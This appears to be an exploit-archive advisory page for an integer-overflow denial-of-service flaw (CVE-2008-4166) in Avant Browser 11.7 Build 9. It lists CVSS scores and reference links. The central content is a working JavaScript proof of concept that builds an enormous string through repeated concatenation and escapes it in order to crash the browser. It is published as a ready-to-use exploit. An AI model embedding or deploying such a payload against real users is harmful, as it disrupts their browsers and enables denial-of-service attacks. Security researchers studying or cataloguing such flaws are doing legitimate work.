Bug: Avant Browser <= 11.7 Build 9 Integer Denial Of Service Exploit ( Ascii Version )

Search:
WLB2

Avant Browser <= 11.7 Build 9 Integer Denial Of Service Exploit

Published
Credit
Risk
2008.09.14
0x90
Low
CWE
CVE
Local
Remote
CWE-189
CVE-2008-4166
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
4.3/10
2.9/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
None
None
Partial

<!--
- Product : Avant Browser
-
- Version : 11.7 Build 9
-
- Author : 0x90
-
- Homepage: WwW.0x90.CoM.Ar
-
- Contact : Guns[at]0x90[dot]com[dot]ar
-->
<script>
var s=String.fromCharCode(257);
var a=""; var b="";
for(i=0;i<1024;i++){a=a+s;}
for(i=0;i<1024;i++){b=b+a;}
var ov=s;
for(i=0;i<28;i++) ov += ov;
for(i=0;i<88;i++) ov += b;
alert("0x90");
var Fuck=escape(ov);
alert("0x90 !");
alert(Fuck);
</script>

References:

http://xforce.iss.net/xforce/xfdb/45121
http://www.securityfocus.com/bid/31155
http://www.securityfocus.com/archive/1/archive/1/496301/100/0/threaded

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version